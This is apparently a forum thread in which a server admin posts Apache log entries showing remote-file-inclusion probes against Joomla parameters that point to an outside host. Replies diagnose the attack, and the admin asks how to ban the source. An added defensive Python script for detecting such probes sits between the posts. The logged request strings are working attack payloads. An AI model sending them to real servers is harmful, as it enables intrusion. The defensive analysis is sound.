Hello Group... Tonight I was looking over various logs on one of my servers and found, when running 'tail -f /var/log/apache2/access.log', what appears to be an attack!!!???

The output of 'tail -f /var/log/apache2/access.log':

Code:
localhost.localdomain - - [26/Mar/2009:13:07:10 -0700] "GET /?reflect_base=http://ecology41.t35.com/scans/damn/id.txt%3f%3f%3f HTTP/1.1" 200 4613 "-" "libwww-perl/5.805"
localhost.localdomain - - [26/Mar/2009:13:09:50 -0700] "GET /?option=com_zoom&Itemid=38//%3fmosConfig_absolute_path=http://ecology41.t35.com/scans/damn/id.txt%3f%3f%3f HTTP/1.1" 200 4613 "-" "libwww-perl/5.805"
localhost.localdomain - - [26/Mar/2009:13:09:50 -0700] "GET /?mosConfig_absolute_path=http://ecology41.t35.com/scans/damn/id.txt%3f%3f%3f HTTP/1.1" 200 4613 "-" "libwww-perl/5.805"
localhost.localdomain - - [26/Mar/2009:13:11:15 -0700] "GET /?path%255Bdocroot%255D=http://ecology41.t35.com/scans/damn/id.txt%3f%3f%3f HTTP/1.1" 200 4613 "-" "libwww-perl/5.805"
localhost.localdomain - - [26/Mar/2009:13:15:11 -0700] "GET /?path%255Bdocroot%255D=http://ecology41.t35.com/scans/damn/id.txt%3f%3f%3f HTTP/1.1" 200 4613 "-" "libwww-perl/5.805"
localhost.localdomain - - [26/Mar/2009:13:15:12 -0700] "GET /?path%255Bdocroot%255D=http://ecology41.t35.com/scans/damn/id.txt%3f%3f%3f HTTP/1.1" 200 4613 "-" "libwww-perl/5.805"
localhost.localdomain - - [26/Mar/2009:13:17:38 -0700] "GET /?reflect_base=http://ecology41.t35.com/scans/damn/id.txt%3f%3f%3f HTTP/1.1" 200 4613 "-" "libwww-perl/5.805"
localhost.localdomain - - [26/Mar/2009:13:17:39 -0700] "GET /?reflect_base=http://ecology41.t35.com/scans/damn/id.txt%3f%3f%3f HTTP/1.1" 200 4613 "-" "libwww-perl/5.805"
localhost.localdomain - - [26/Mar/2009:13:24:39 -0700] "GET /?option=com_content&v...i-asterisk-1-6-x&Itemid=6//%3fmosConfig_absolute_path=http://ecology41.t35.com/scans/damn/id.txt%3f%3f%3f HTTP/1.1" 200 4613 "-" "libwww-perl/5.805"
localhost.localdomain - - [26/Mar/2009:13:24:40 -0700] "GET /?mosConfig_absolute_path=http://ecology41.t35.com/scans/damn/id.txt%3f%3f%3f HTTP/1.1" 200 4613 "-" "libwww-perl/5.805"

Thanking you in advance for your help. Best Regards
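The entries above share one pattern: a query parameter whose value is a URL on another server, which is what a remote-file-inclusion (RFI) probe against a PHP application looks like in an access log. The script below is an added example, not part of the original post. It parses Apache "combined" format lines, decodes the request target repeatedly (the `%255B` in `path%255Bdocroot%255D` is double-encoded, so one decode pass would miss the real parameter name), pulls out every parameter that carries an external URL, and groups the hits by client host and user agent so you know what to block. It also flags entries whose `%h` field is a hostname rather than an IP address (as `localhost.localdomain` is here), since that usually means `HostnameLookups` is on or a proxy sits in front of Apache and the real client address has to come from elsewhere. The sample lines are copied from the post; the regexes and the decode limit are this example's own choices.

```python
"""Added example: find remote-file-inclusion probes in Apache access-log lines
and summarise who sent them. Not code from the original post or any project."""
import ipaddress
import re
from collections import Counter
from urllib.parse import unquote, urlsplit

# Apache "combined" LogFormat:
#   %h %l %u %t "%r" %>s %b "%{Referer}i" "%{User-Agent}i"
COMBINED_RE = re.compile(
    r'^(?P<host>\S+) (?P<ident>\S+) (?P<user>\S+) \[(?P<time>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) (?P<proto>[^"]*)" '
    r'(?P<status>\d{3}) (?P<bytes>\S+) "(?P<referer>[^"]*)" "(?P<agent>[^"]*)"$'
)

# name=URL pairs in a decoded request target whose value points at another server
RFI_PAIR_RE = re.compile(
    r'(?P<name>[\w\[\].-]+)=(?P<url>(?:https?|ftp)://[^&\s"]+)', re.IGNORECASE
)

# Sample entries copied from the post above (first three of the listing).
SAMPLE_LINES = [
    'localhost.localdomain - - [26/Mar/2009:13:07:10 -0700] "GET /?reflect_base=http://ecology41.t35.com/scans/damn/id.txt%3f%3f%3f HTTP/1.1" 200 4613 "-" "libwww-perl/5.805"',
    'localhost.localdomain - - [26/Mar/2009:13:09:50 -0700] "GET /?option=com_zoom&Itemid=38//%3fmosConfig_absolute_path=http://ecology41.t35.com/scans/damn/id.txt%3f%3f%3f HTTP/1.1" 200 4613 "-" "libwww-perl/5.805"',
    'localhost.localdomain - - [26/Mar/2009:13:09:50 -0700] "GET /?mosConfig_absolute_path=http://ecology41.t35.com/scans/damn/id.txt%3f%3f%3f HTTP/1.1" 200 4613 "-" "libwww-perl/5.805"',
]


def parse_line(line):
    """Split one combined-format line into its fields; None if it does not match."""
    m = COMBINED_RE.match(line.strip())
    return m.groupdict() if m else None


def fully_decode(text, max_rounds=3):
    """Percent-decode repeatedly: probes often double-encode ("%255B" -> "%5B" -> "[")
    so that a single decode pass still hides the real parameter name. The round
    limit is an arbitrary choice for this example."""
    for _ in range(max_rounds):
        decoded = unquote(text)
        if decoded == text:
            break
        text = decoded
    return text


def rfi_params(target):
    """Return [(param_name, url), ...] for every parameter in the request target
    whose value is an external URL, the signature of an RFI probe."""
    decoded = fully_decode(target)
    return [(m.group('name'), m.group('url')) for m in RFI_PAIR_RE.finditer(decoded)]


def is_ip_literal(host):
    """True if Apache's %h field holds an IP address rather than a looked-up name."""
    try:
        ipaddress.ip_address(host)
        return True
    except ValueError:
        return False


def summarize(lines):
    """Group RFI probes by (client, user agent), collect the hosts they try to
    include from, and note clients logged by name instead of address."""
    by_source = Counter()
    include_hosts = set()
    ambiguous_sources = set()
    for line in lines:
        entry = parse_line(line)
        if entry is None:
            continue
        hits = rfi_params(entry['target'])
        if not hits:
            continue
        by_source[(entry['host'], entry['agent'])] += 1
        for _, url in hits:
            include_hosts.add(urlsplit(url).hostname)
        if not is_ip_literal(entry['host']):
            ambiguous_sources.add(entry['host'])
    return {'by_source': by_source, 'include_hosts': include_hosts,
            'ambiguous_sources': ambiguous_sources}


if __name__ == '__main__':
    report = summarize(SAMPLE_LINES)
    for (host, agent), count in report['by_source'].most_common():
        print(f'{count:4d} probes from {host} ({agent})')
    print('include hosts:', ', '.join(sorted(report['include_hosts'])))
    for host in sorted(report['ambiguous_sources']):
        print(f'{host}: logged as a name, not an IP; check HostnameLookups or proxy headers')
```

To run it against a real log, replace `SAMPLE_LINES` with the lines of `/var/log/apache2/access.log`. If the report lists a client as a hostname, a firewall rule cannot be written from the log alone: turn `HostnameLookups` off so `%h` records the address, or, if a reverse proxy is in front, log the proxy's forwarded-for header and block on that.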
Looks like an attack on Joomla or a similar CMS? When googling for some of the parameters, e.g. mosConfig_absolute_path or reflect_base, it looks like moscms or Joomla.
Thank you for the replies...

Robilaur: I searched the box for 'id.txt' but this file is non-existent. Also, how would I go about banning the user? I am not seeing any particular IP he is coming from, only 'localhost.localdomain'?

Ben: Hmm, I never did personally like Joomla and the application has yet to be used, so I just removed it entirely from the server. But I would still like to know how to ban the 'user' responsible though; your suggestions are very welcome.

Thank you for your help... Best Regards